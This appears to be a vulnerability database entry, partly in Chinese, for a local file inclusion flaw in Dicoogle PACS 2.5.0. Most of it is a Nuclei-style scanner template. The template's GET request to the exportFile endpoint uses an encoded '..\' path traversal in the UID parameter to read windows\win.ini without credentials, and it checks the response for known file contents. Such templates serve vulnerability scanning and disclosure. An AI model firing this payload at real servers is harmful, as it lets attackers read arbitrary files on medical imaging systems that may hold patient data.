dicoogle-pacs-lfi: Dicoogle PACS 2.5.0 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Dicoogle PACS | POC: 已公开

漏洞描述

Dicoogle PACS 2.5.0 is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required.

PoC代码[已公开]

id: dicoogle-pacs-lfi

info:
  name: Dicoogle PACS 2.5.0 - Local File Inclusion
  author: 0x_akoko
  severity: high
  description: Dicoogle PACS 2.5.0 is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required.
  reference:
    - https://www.exploit-db.com/exploits/45007
    - https://cxsecurity.com/issue/WLB-2018070131
    - http://www.dicoogle.com/home
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: edb,windows,lfi,dicoogle,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 490a0046304402202da46fc563b3d5b0f992da82a8137bf0ae03f5b16ff438694dd8fa52532c9bca0220016c0f2f315c0c6936701d514f59752bb7bea1bb0efe4180634ae59f65f01e5c:922c64590222798bb761d5b6d8e72950

相关漏洞推荐